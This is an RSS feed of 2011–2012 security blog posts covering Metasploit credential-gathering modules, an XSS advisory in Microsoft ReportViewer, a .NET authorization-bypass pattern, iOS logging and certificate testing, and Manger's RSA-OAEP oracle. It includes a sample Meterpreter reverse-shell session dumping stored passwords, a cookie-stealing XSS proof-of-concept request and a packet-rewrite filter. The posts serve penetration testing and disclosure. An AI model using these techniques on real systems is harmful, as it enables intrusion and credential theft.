<item><title>Metasploit Post Exploitation Module Updates</title><description>Secuobs.com : 2012-06-27 16:54:17 - GDS Blog -    Post exploitation is a critical component of any penetration test In support of such activities we ve recently comitted a few updates to the post exploitation modules within Metasploit  1  Microsoft Outlook Post Exploitation  This module extracts and decrypts credentials for stored e-mail accounts This update contains better handling of outbound SMTP servers requiring authentication This module has proven quite useful during numerous penetration tests 2  TortoiseSVN Post Exploitation  This new module extracts and decrypts SVN credentails for stored accounts Such post modules can be utilized within Metasploit s Meterpreter environment Below demonstrates their use through a reverse shell msf  use exploit multi handler msf exploit handler   exploit   Started reverse handler on 192168215 4444   Starting the payload handler    Sending stage  752128 bytes  to 19216825   Meterpreter session 1 opened  192168215 4444 - 19216825 28765  meterpreter  run post windows gather credentials outlook   Searching for Microsoft Outlook in Registry    Microsoft Outlook found in Registry    Account Found    Type  IMAP   User Display Name  John Smith   User E-mail Address  jsmith testcom   User Name  jsmith testcom   User Password  password123   Incoming Mail Server  IMAP  imaptestcom   IMAP Use SSL  Yes   IMAP Port  993   Outgoing Mail Server  SMTP  smtptestcom  Authentication Required    Outgoing Mail Server  SMTP  User Name  jsmith testcom   Outgoing Mail Server  SMTP  Password  password123   SMTP Use SSL  Yes   SMTP Port  587     Complete meterpreter  run post windows gather credentials tortoisesvn   Searching for TortoiseSVN    Checking for configuration files in  C Users John AppData Roaming Subversion auth svnsimple    Account Found    URL  https svntestcom 443   Realm  SVN Server   User Name  jsmith   Password  password123     Complete Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/384124.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/384124.shtml</guid></item>
<item><title>Securing Development with PMD</title><description>Secuobs.com : 2012-05-22 10:09:57 - GDS Blog -    Back in April I presented my Securing Development with PMD  Teaching an Old Dog New Tricks  presentation at OWASP AppSec DC The main idea was to demonstrate how security can be integrated into development without introducing new tools to existing developer toolsets As an example, I discussed how PMD, a well-known open source static analysis tool that finds code quality issues in Java source code, can be extended with custom rules to find common application security bugs With minimal change to existing PMD deployments and without having to learn to use another new tool, Java developers can identify and remediate both code quality and security bugs together You can download my presentation here and the latest version of the GDS Secure Coding Ruleset for PMD can be found on our GitHub web page here I encourage developers as well as pen-testers to use and improve the ruleset Enjoy   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/376880.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/376880.shtml</guid></item>
<item><title>Using Metasploit to Access Standalone CCTV Video Surveillance Systems</title><description>Secuobs.com : 2012-05-15 16:24:24 - GDS Blog -    if  ipproto   TCP   tcpsrc   5920    replace x00 x01 x03 x01 x00 x00 x00 x00 ,  x00 x01 x05 x01 x00 x00 x00 x00  msg Filter executed n     IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/375608.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/375608.shtml</guid></item>
<item><title>Debunking NSLog Misconceptions</title><description>Secuobs.com : 2012-03-28 16:39:51 - GDS Blog -    It is a fairly common occurrence to encounter iOS applications that are logging sensitive data during mobile application security assessments Some examples of sensitive data we have seen logged include authentication tokens, session cookies, passwords, etc We have also noticed that developers sometimes do not fully understand the implications of logging this data using the NSLog function Lets walk through some of these misconceptions 1 NSLog data is only displayed in the device console and not stored on the device When writing an iOS application, developers commonly use NSLog for debugging purposes and the data is displayed within the device console provided by XCode Behind the scenes, the data passed to the NSLog function is logged using the Apple System Log  ASL , which is Apple s alternative for syslogd On iOS devices, the data logged using ASL appears to be cached until the device is rebooted 2 NSLog data cannot be read by other applications The Apple System Log C library  aslh , which is available for Mac OS X, is also available on iOS This library can be used to print out the contents of the ASL and even perform queries to retrieve specific log data An example of a query would be querying for data logged by specific applications One might ask, what about the iOS sandbox  Shouldn t the sandbox prevent applications from accessing data logged by another application  Unfortunately, the iOS sandbox does not protect the ASL and therefore any application is able to view the data logged by another application The following documentation details the ASL API for writing, reading and querying data from the ASL  http developerapplecom library mac documentation Darwin Reference ManPages man3 asl_search3html apple_ref doc man 3 asl_search 3 iOS prevents applications from utilizing these low level C APIs during their submission review process Unfortunately, it does not look like Apple has a strict restriction on iOS applications utilizing the ASL C library in order to retrieve data from the ASL There are applications currently in the App Store that are able to read and perform queries on ASL data One example of such an application is the  AppSwitch  application So let us recap,   iOS application data logged using NSLog utilizes the Apple System Log  ASL  which caches the data logged until the device is rebooted   The ASL data can be read and queried through a C API available for iOS applications This API is not restricted by Apple s application review process   The ASL data is not sandboxed and therefore any iOS application can read data logged by arbitrary applications Due to all these conditions, logging sensitive data using NSLog should be considered a fairly high-risk issue If applications are logging sensitive authentication data, a malicious application would be able to actively query for this data and send it off to a remote server Developers should get in the habit of using a preprocessor macro for performing any logging used during the development process The following blog post provides a nice walkthrough on how to utilize NSLog when building in DEBUG mode and how to remove all NSLog statements within production builds http wwwcimgfcom 2009 01 24 dropping-nslog-in-release-builds   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/366707.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/366707.shtml</guid></item>
<item><title>SOURCE Barcelona  Rails Slides Posted</title><description>Secuobs.com : 2011-11-29 00:10:41 - GDS Blog -    My presentation slides  Security Goodness with Ruby on Rails  from last week's SOURCE Barcelona Conference are posted here During the talk I spoke about strategies for both auditing and writing more secure applications with this popular framework I covered a number of different topics including  best practices, security tools and APIs, and how to identify and address the most common vulnerabilities Thanks to Stacy and and the SOURCE Barcelona Advisory Board for putting on such a great conference As always, I felt very comfortable there and had a great time I highly recommend attending SOURCE next year and enjoying Barcelona as well  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/344205.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/344205.shtml</guid></item>
<item><title>Ekoparty Presentation  Cloud   Control</title><description>Secuobs.com : 2011-09-27 15:27:51 - GDS Blog -    I gave my first presentation at a security conference on Friday, presenting at ekoparty on some work I did at the beginning of the year on distributing complex tasks to hundreds or thousands of computers SETI Home was the project that pioneered the idea of distributed volunteer computing, and their command   control software evolved into a generic project called BOINC You can run just about any application in BOINC - whether it's open or closed source, uses GPUs, the network, or even if it's not CPU intensive  like nmapping the internet  Setting up a server isn't the most exciting topic to talk about, so I used two examples to illustrate BOINC in my presentation  factoring RSA512 to recover the private key to SSL certificates or PGP keys and cracking passwords Factoring was a huge success, but cracking didn't work out that well BOINC was able to distribute the work and crack things really quickly - by splitting up wordlists automatically based on hash functions I was able to scale out to more machines than I think most people are able to but the problem came from never actually looking at the output The best crackers, especially in cracking contests, find patterns in the cracked passwords to make mangling rules and masks and crack more passwords You could still use BOINC as a work distributor to scale out, but you need to be behind the wheel making work units - not use it as a fire-and-forget system Getting applications running in BOINC is a bit of trial and error If it's an open source application, you have to patch it a little bit and if it's closed source you have to write a jobxml file defining how to run the application In either case you have to define input and output templates that let BOINC know what files to send with the workunit and to expect the program to produce And when I was sending a couple hundred MB wordlists and resource files, I wanted to compress them and decompress them on the client, so that added a little bit of work too To try and make it easier on you, I've released all the scripts, templates, config files, and patches I created while working with BOINC I've also not just released my slides, but annotated them with links to the reference material for everything mentioned Everything is up on github I've wanted to factor large numbers for a while, and this was actually what got me into this whole mess I have some  simple  observations about factoring using the General Number Field Sieve, as well as instructions for how to do it yourself  with or without BOINC  I have to thank Leonardo and all the ekoparty organizers for putting on a great conference They went out of the way to make the international arrivees as comfortable as possible, and even had simultaneous translation from english to spanish and from spanish to english Buenos Aires is a wonderful city, and I really recommend you visit   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/331270.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/331270.shtml</guid></item>
<item><title>NET ServerTransfer vs ResponseRedirect - Reiterating a Security Warning</title><description>Secuobs.com : 2011-09-09 12:11:28 - GDS Blog -    During several recent NET  C  security code review projects, multiple severe authorization bypass vulnerabilities were identified that allowed unprivileged remote users to access any page hosted on the web server, despite not having been provisioned with the appropriate required security access permissions  Typically an attacker could leverage this type of vulnerability to access application administration functionality, both to obtain access to application data and to consolidate on-going future privileged access for themselves  The primary cause of these vulnerabilities was insecure use of the ServerTransfer method As we continue to regularly identify and exploit this issue during our security reviews I thought I would write this quick blog in an effort to further raise awareness around this simple yet often overlooked security item Ultimately, any use of the ServerTransfer method that takes in user controllable input is likely to result in authorization bypass vulnerabilities  amongst other possible security issues  This is a known issue and is captured in the Microsoft Support KB Article ID  320976  http supportmicrosoftcom kb 320976  The underlying security  gotcha  that is not well communicated publicized to developers is that when using the ServerTransfer method, the new page is being retrieved and presented by a separate handler, during which no authorization checks are performed regarding the actual remote user callers identity This is very different from the ResponseRedirect method which instructs the user s browser to request a different page, and forces a new page request - thus  hopefully  triggering an appropriate authorization check Unfortunately, much of the core standard documentation available to developers makes no mention of this important security factor, including those found on the MSDN site  http msdnmicrosoftcom en-us library ms525800pourcents28v vs90pourcents29aspx  In fact, on first glance the documentation on MSDN states that  ServerTransfer acts as an efficient replacement for the ResponseRedirect method  but does not highlight the potential security implications of using this method  However, to be fair, the MS Patterns and Practices team do capture this exact issue in Chapter 6 of their  Improving NET Application Performance and Scalability  publication  http msdnmicrosoftcom en-us library ff647787aspx  As an example, the following vulnerable code snip is representative of those we regularly identify and leverage in proof-of-concept authorization bypass attacks  protected void btnBack_Click object sender, SystemEventArgs e    string returnUrl   Request ReturnUrl  if  returnUrl   null    returnUrl    Loginaspx    ServerTransfer returnUrl  ResponseEnd    The function above will redirect the browser to the page contained in the ReturnUrl parameter, unless it is null in which case the browser will be redirected to the login page A typical application will have authorization checks to confirm if a user is authorized to view a requested page but as discussed previously when the ServerTransfer method is used, this logic will be bypassed  assuming that the page requested is hosted on the server  As the  ReturnUrl  parameter is user controllable, this function makes it possible to load any page on the server, including admin pages that lower privileged users should not be authorized to view It is also possible to download DLLs from the  bin directory if the name of the dll is known  the dll can then be decompiled for further analysis  However, IIS does prevent the webconfig file from being viewed If the ResponseRedirect method was used in the code sample above, the browser would issue a new request for the page passed in the ReturnUrl parameter  because this would be a new request it would pass through the permissions checks again and the authorization bypass vulnerability would be prevented The ServerTransfer method of course can be used in valid circumstances such as to redirect to a page where the destination is not user-controllable  ie perhaps using an index of hardcoded  safe , non-privileged destinations  Developers should take into account the differences between the ServerTransfer and ResponseRedirect methods and understand that the ServerTransfer method is NOT always a secure replacement for the ResponseRedirect method  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/327953.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/327953.shtml</guid></item>
<item><title>XSS in Microsoft ReportViewer</title><description>Secuobs.com : 2011-08-25 17:12:57 - GDS Blog -    Lost amongst the numerous issues patched during this month's Patch Tuesday was a bug I found in Microsoft's ReportViewer 2005 Web Controls While the issue was really just a vanilla XSS, the surprising thing was that it was in a product that has been out for 6 years and hasn't been found or patched in that time You mean to tell me nobody's ever fuzzed that request  We're not talking about a complex memory corruption bug here  Anyway, the technical details and a walkthrough of the bug can be found below Overview The Microsoft ReportViewer Controls are a freely redistributable control that enables embedding reports in applications developed using the NET Framework A Cross-Site Scripting  XSS  vulnerability was found in the MicrosoftReportViewerWebFormsdll library The XSS vulnerability appears to affect all websites that utilize the affected controls Technical Details File  MicrosoftReportViewerWebFormsdll  PerformOperation  method of the SessionKeepAliveOperation class  1  User controllable data enters via the  TimerMethod  URL parameter value and is assigned to the  andEnsureParam  string variable string andEnsureParam   HandlerOperationGetAndEnsureParam  urlQuery,  TimerMethod  2  The  andEnsureParam  variable with user-controllable input is then passed into the  s  string variable which is dynamically building a javascript block The  s  variable is then passed to responsewrite  Writing the un-validated data to the JS block creates the XSS exposure string s   stringFormat CultureInfoInvariantCulture,   parent 0   , new object    andEnsureParam   responseWrite s  Proof-of-Concept Exploit This vulnerability can be exploited against websites that have deployed the vulnerable MicrosoftReportViewerWebFormsdll library You will note that since the data is being written into an existing Javascript block that the attacker does not need to include any opening or closing tags  ie,, , etc  to execute code Reproduction Request  https testcom ReservedReportViewerWebControlaxd Mode true  ReportID ControlID  Culture 1033 UICulture 1033 ReportStack 1 OpType SessionKeepAlive  TimerMethod KeepAliveMethodctl00_PlaceHolderMain_ SiteTopUsersByHits_ctl00TouchSession0 alert documentcookie   CacheSeed   Note  During testing of this issue, it appeared as though a valid ControlID parameter value was needed to exploit this issue  Recommendation Update to the latest versions For more information please see http wwwmicrosoftcom technet security Bulletin MS11-067mspx  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/325185.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/325185.shtml</guid></item>
<item><title>Accepting Un-Trusted Certificates using the iOS Simulator</title><description>Secuobs.com : 2011-08-09 17:44:19 - GDS Blog -    There are scenarios where an iOS developer might want to accept an un-trusted SSL certificate, such as when they are testing their application using the iOS simulator By default applications using the NSUrlConnection API for performing remote connections contains built-in certificate validation Therefore, developers or testers may encounter issues when testing HTTPS traffic using the iOS simulator Some example scenarios may include applications communicating with remote services hosted on a non-production environment using self-signed certificates or the testers who need to debug SSL communication between the application and service using a local proxy tool, such as Burp Proxy or Fiddler From a developer s perspective, what is the best way to accept SSL certificates  While performing a Google search, I encountered the following thread on Stack Overflow discussing ways to accept self-signed certificates when using NSUrlConnection to connect to a website In general, the responses all recommended performing code level changes in order to disable the built in certificate validation performed by iOS Although, some answers recommend disabling certificate validation against certain hosts, there are also recommendations for disabling validation against all hosts Given the temptation to copy and paste, this guidance is likely to result in insecure iOS application releases to the Apple App Store as the applications will be susceptible to man in the middle attacks Is there a better way to temporarily trust un-trusted certificates within the Simulator  In my opinion, the more secure way is to add the Certificate Authority CA  certificate which signed the website s certificate as a Trusted CA on the simulator On an iOS device, this can be performed easily by opening the CA certificate on the device by emailing the certificate  however this is not possible with the simulator Behind the scenes, when a CA certificate is added as a Trusted CA on the device, the certificate is inserted into the tsettings table of the TrustStoresqlite3 database This database is also used by the Simulator and can be found in the  Library Application Support iPhone Simulator Library Keychains  directory on your Mac workstation The tsettings table stores the contents of the CA certificate  Fingerprint, Subject, etc  but the only field needed by iOS during validation is the sha1 column which refers to the certificate's SHA1 fingerprint The table can be manually modified by using one of the many available SQLite clients In order to simplify this process, I wrote a simple python script which can be used to import CA certificates into each TrustStore database used by the Simulator The following example will walkthrough the steps for importing the Portswigger CA certificate Importing this certificate will provide testers with the ability to intercept application HTTPS traffic using Burp Proxy Although we can view and intercept SSL HTTP traffic while testing applications, the insecurity of accepting un-trusted certificates is no longer built into the application logic Step 1  Modify the System Preferences Network Proxy settings on your Mac in order to have all HTTP HTTPS traffic be sent to your Burp Proxy Step 2  Visit an HTTPS website using Firefox You will be shown a  This Connection is Untrusted  error page Choose the Add Exception option and then click the View button Enter the Details tab and you will be shown information about the certificate chain Select the PortSwigger CA within the  Certificate Hierarchy  listing Export the Certificate to the directory of your choice Step 3  Run the add_ca_to_iossim script and pass in the exported certificate as an argument Sample Usage  python add_ca_to_iossimpy PortSwiggerCAcer Successfully added CA to  User GDS Library Application Support iPhone Simulator 43 Library Keychains TrustStoresqlite3 Successfully added CA to  User GDS Library Application Support iPhone Simulator 432 Library Keychains TrustStoresqlite3 Run the simulator while proxying through Burp Proxy and you should be able to intercept HTTPS application sent by your application The add_ca_to_iossim python script can be download within the GDS Github page  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/321989.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/321989.shtml</guid></item>
<item><title>Beyond Padding Oracle - Manger's Oracle and RSA OAEP Padding</title><description>Secuobs.com : 2011-07-28 20:26:32 - GDS Blog -    Several months ago I was looking at the proceedings from  days 2010 and read Pascal Junod's slides Open-Source Cryptographic Libraries and Embedded Platforms In them, he mentioned James Manger's attack on RSA OAEP, a padding scheme first defined in PKCS  1 v20 I hadn't heard of it before, and it interested me enough to investigate  The paper is available via Google or ACM if you're a member  The basics of the attack are similar to the Padding Oracle attack in that a small piece of information is exposed via error messages and doing some clever math you can use that to retrieve the plaintext from the ciphertext After the ciphertext is decrypted, the OAEP decoding process begins The decrypted plaintext is supposed to fit in one less byte than the maximum size of the ciphertext If the plaintext does not have a 00 in the highest byte, the ciphertext is considered to have been tampered with and an error is returned Because of the properties of RSA, you can directly influence the plaintext p by multiplying the ciphertext c by xe mod n - where e is the exponent from the public key, n the modulus, and x the arbitrary number you want to multiply the plaintext by This will produce a plaintext p x mod n after decryption Manger's Oracle relies on manipulating the plaintext and detecting when it has overflowed into the highest byte Using a method reminiscent of binary search, the possible values of the plaintext are narrowed down until only one remains - allowing recovery of the plaintext from the ciphertext The number of oracle queries needed depends on keysize  for 1024, it's around 1200 I checked the popular implementations of RSA-OAEP and found none of them vulnerable to Manger's Oracle OpenSSL specifically protects against it, calling Manger out by name in the comments BouncyCastle and the NET implementation were secure because they didn't throw an error if the first byte was non-zero  probably on the assumption that another part of OAEP, the hash, wouldn't match  Libgcrypt didn't implement RSA-OAEP - a patch had been provided a few years ago, but it was never merged until a few weeks ago when it was committed to trunk The new code wasn't actually directly vulnerable - the same error code was returned no matter the type of error that occurred Regardless, I decided this would be a fun exercise and set about implementing the attack I got it working  but only after editing the source of libgcrypt to 'cheat', providing my own oracle I managed to find a mistake in the original paper too, a floor  that should have been a ceil  - detailed in the code linked later Since I modified the libgcrypt code to provide an oracle, it was an overly contrived example, but it seemed like it might be possible to exploit it using a timing attack After measuring and graphing the differences between the two cases, I saw you could determine the error from timing information - so long as you looked at the percentiles over a sufficient number of trials, as shown below It isn't 100pourcents reliable, but I was able to get a working proof of concept going with just timing information Timing Comparison Left two box plots show the longer execution time, right two show the shorter I've published the code to exploit the oracle in a contrived case, and included the code and steps to demonstrate the timing differential The code is on github, and as far as I know, this is the only public implementation of Manger's Oracle  Although apparently it is assigned as homework somewhere   OAEP Padding  is indeed an example of RAS Syndrome  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/319797.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/319797.shtml</guid></item>
</channel>
</rss>
 
